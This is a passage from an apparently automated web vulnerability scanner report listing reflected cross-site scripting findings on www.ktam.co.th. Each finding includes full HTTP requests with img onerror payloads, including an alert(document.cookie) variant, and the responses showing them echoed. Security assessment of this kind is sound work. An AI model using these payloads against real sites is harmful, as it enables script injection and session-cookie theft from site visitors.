HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:48 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29514

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/aff890\"><img src=a onerror=alert(1)>6438a4cf726" title="THAI">
...[SNIP]...

5.80. http://www.ktam.co.th/en/index.php/declarationnav.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/declarationnav.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3371d"><img%20src%3da%20onerror%3dalert(1)>ae077ea9f98 was submitted in the REST URL parameter 3. This input was echoed as 3371d\"><img src=a onerror=alert(1)>ae077ea9f98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/declarationnav.php3371d"><img%20src%3da%20onerror%3dalert(1)>ae077ea9f98 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:12 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29531

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/declarationnav.php3371d\"><img src=a onerror=alert(1)>ae077ea9f98" title="THAI">
...[SNIP]...

5.81. http://www.ktam.co.th/en/index.php/declarationnav.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/declarationnav.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5d8d"><img%20src%3da%20onerror%3dalert(1)>faa0c6bef0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5d8d\"><img src=a onerror=alert(1)>faa0c6bef0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/declarationnav.php/b5d8d"><img%20src%3da%20onerror%3dalert(1)>faa0c6bef0f HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:48 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29513

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b5d8d\"><img src=a onerror=alert(1)>faa0c6bef0f" title="THAI">
...[SNIP]...

5.82. http://www.ktam.co.th/en/index.php/ims/ads_csi300_2.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/ads_csi300_2.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c49d7"><img%20src%3da%20onerror%3dalert(1)>6f99f2df67 was submitted in the REST URL parameter 4. This input was echoed as c49d7\"><img src=a onerror=alert(1)>6f99f2df67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/ads_csi300_2.gifc49d7"><img%20src%3da%20onerror%3dalert(1)>6f99f2df67 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:23 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29528

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/ads_csi300_2.gifc49d7\"><img src=a onerror=alert(1)>6f99f2df67" title="THAI">
...[SNIP]...

5.83. http://www.ktam.co.th/en/index.php/ims/b_ktam_news11.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news11.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a103d"><img%20src%3da%20onerror%3dalert(1)>6d31d68549b was submitted in the REST URL parameter 4. This input was echoed as a103d\"><img src=a onerror=alert(1)>6d31d68549b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_ktam_news11.gifa103d"><img%20src%3da%20onerror%3dalert(1)>6d31d68549b HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:18 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29530

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_ktam_news11.gifa103d\"><img src=a onerror=alert(1)>6d31d68549b" title="THAI">
...[SNIP]...

5.84. http://www.ktam.co.th/en/index.php/ims/b_ktam_news12.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news12.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e95fd"><img%20src%3da%20onerror%3dalert(1)>3b594682de3 was submitted in the REST URL parameter 4. This input was echoed as e95fd\"><img src=a onerror=alert(1)>3b594682de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_ktam_news12.gife95fd"><img%20src%3da%20onerror%3dalert(1)>3b594682de3 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:29 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29530

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_ktam_news12.gife95fd\"><img src=a onerror=alert(1)>3b594682de3" title="THAI">
...[SNIP]...

5.85. http://www.ktam.co.th/en/index.php/ims/b_ktam_news13.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news13.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b80a"><img%20src%3da%20onerror%3dalert(1)>1842f6f998e was submitted in the REST URL parameter 4. This input was echoed as 8b80a\"><img src=a onerror=alert(1)>1842f6f998e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_ktam_news13.gif8b80a"><img%20src%3da%20onerror%3dalert(1)>1842f6f998e HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:04 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29530

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_ktam_news13.gif8b80a\"><img src=a onerror=alert(1)>1842f6f998e" title="THAI">
...[SNIP]...

5.86. http://www.ktam.co.th/en/index.php/ims/b_ktam_news21.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news21.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e76"><img%20src%3da%20onerror%3dalert(1)>a1278aa297d was submitted in the REST URL parameter 4. This input was echoed as 35e76\"><img src=a onerror=alert(1)>a1278aa297d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_ktam_news21.gif35e76"><img%20src%3da%20onerror%3dalert(1)>a1278aa297d HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:06 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29530

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_ktam_news21.gif35e76\"><img src=a onerror=alert(1)>a1278aa297d" title="THAI">
...[SNIP]...

5.87. http://www.ktam.co.th/en/index.php/ims/b_ktam_news22.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news22.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d1c7"><img%20src%3da%20onerror%3dalert(1)>c2f0f509d8a was submitted in the REST URL parameter 4. This input was echoed as 9d1c7\"><img src=a onerror=alert(1)>c2f0f509d8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_ktam_news22.gif9d1c7"><img%20src%3da%20onerror%3dalert(1)>c2f0f509d8a HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:30 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29530

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_ktam_news22.gif9d1c7\"><img src=a onerror=alert(1)>c2f0f509d8a" title="THAI">
...[SNIP]...

5.88. http://www.ktam.co.th/en/index.php/ims/b_ktam_news23.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news23.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a605"><img%20src%3da%20onerror%3dalert(1)>6666c083050 was submitted in the REST URL parameter 4. This input was echoed as 5a605\"><img src=a onerror=alert(1)>6666c083050 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_ktam_news23.gif5a605"><img%20src%3da%20onerror%3dalert(1)>6666c083050 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:17 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29530

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_ktam_news23.gif5a605\"><img src=a onerror=alert(1)>6666c083050" title="THAI">
...[SNIP]...

5.89. http://www.ktam.co.th/en/index.php/ims/b_nav11.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav11.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29f86"><img%20src%3da%20onerror%3dalert(1)>35c95f69899 was submitted in the REST URL parameter 4. This input was echoed as 29f86\"><img src=a onerror=alert(1)>35c95f69899 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_nav11.gif29f86"><img%20src%3da%20onerror%3dalert(1)>35c95f69899 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:10 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_nav11.gif29f86\"><img src=a onerror=alert(1)>35c95f69899" title="THAI">
...[SNIP]...

5.90. http://www.ktam.co.th/en/index.php/ims/b_nav12.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav12.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 116c6"><img%20src%3da%20onerror%3dalert(1)>1c67b90e00f was submitted in the REST URL parameter 4. This input was echoed as 116c6\"><img src=a onerror=alert(1)>1c67b90e00f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_nav12.gif116c6"><img%20src%3da%20onerror%3dalert(1)>1c67b90e00f HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:28 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_nav12.gif116c6\"><img src=a onerror=alert(1)>1c67b90e00f" title="THAI">
...[SNIP]...

5.91. http://www.ktam.co.th/en/index.php/ims/b_nav13.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav13.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd1c1"><img%20src%3da%20onerror%3dalert(1)>a9ad0d65c41 was submitted in the REST URL parameter 4. This input was echoed as fd1c1\"><img src=a onerror=alert(1)>a9ad0d65c41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_nav13.giffd1c1"><img%20src%3da%20onerror%3dalert(1)>a9ad0d65c41 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:16 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_nav13.giffd1c1\"><img src=a onerror=alert(1)>a9ad0d65c41" title="THAI">
...[SNIP]...

5.92. http://www.ktam.co.th/en/index.php/ims/b_nav21.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav21.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a41c"><img%20src%3da%20onerror%3dalert(1)>27d7fb1ea05 was submitted in the REST URL parameter 4. This input was echoed as 4a41c\"><img src=a onerror=alert(1)>27d7fb1ea05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_nav21.gif4a41c"><img%20src%3da%20onerror%3dalert(1)>27d7fb1ea05 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:16 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
